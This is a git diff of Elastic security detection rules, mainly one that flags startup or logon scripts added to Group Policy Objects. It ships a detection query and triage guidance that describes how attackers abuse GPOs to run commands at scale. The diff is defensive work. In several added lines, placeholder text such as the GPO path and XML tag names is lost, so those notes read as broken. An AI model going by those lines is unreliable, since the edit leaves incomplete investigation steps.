15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "host.os.type:windows and\n(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -76,7 +76,7 @@ ], "risk_score": 47, "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json index a1d64169c91..1c89a2bd6ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json +++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Startup/Logon Script added to Group Policy Object", - "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json index da08c4cdc8b..1edc1fbf929 100644 --- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json +++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Startup/Logon Script added to Group Policy Object", - "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json index 09b12a31feb..0bf1ba336ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json +++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Startup/Logon Script added to Group Policy Object", - "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", - "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n", + "setup": "\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json index fad2c1ca4ca..a8f8a931940 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_102.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json index 8dba01fddb4..7d23886099c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_103.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json index c4850e6f74d..84c6a46655d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c59-fc0fa58336a5_104.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json index 0a08cd6f62b..2b770e77f8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_101.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json index 4ee1fee6dc7..e4c3b64e7ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_102.json @@ -31,7 +31,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json index d710d21e3ad..5c3477274b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9c71-fc0fa58338c7_103.json @@ -41,7 +41,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json index 6c6b9a1877a..3cdb77524fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_102.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json index 1941e7b1895..8ffb8bb0505 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_103.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json index 317d1b76ee9..a32e7eb119f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d60-fc0fa58337b6_104.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json index 5c554c0ff87..603c7f162ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_101.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json index 0042fd44b71..0c491267255 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_102.json @@ -31,7 +31,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json index 4f7c6724a4e..3342f193907 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9d82-fc0fa58449c8_103.json @@ -41,7 +41,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json index 265bf4caada..a2185a06a68 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_101.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json index 319c0708a65..cc832f03fa4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_102.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial 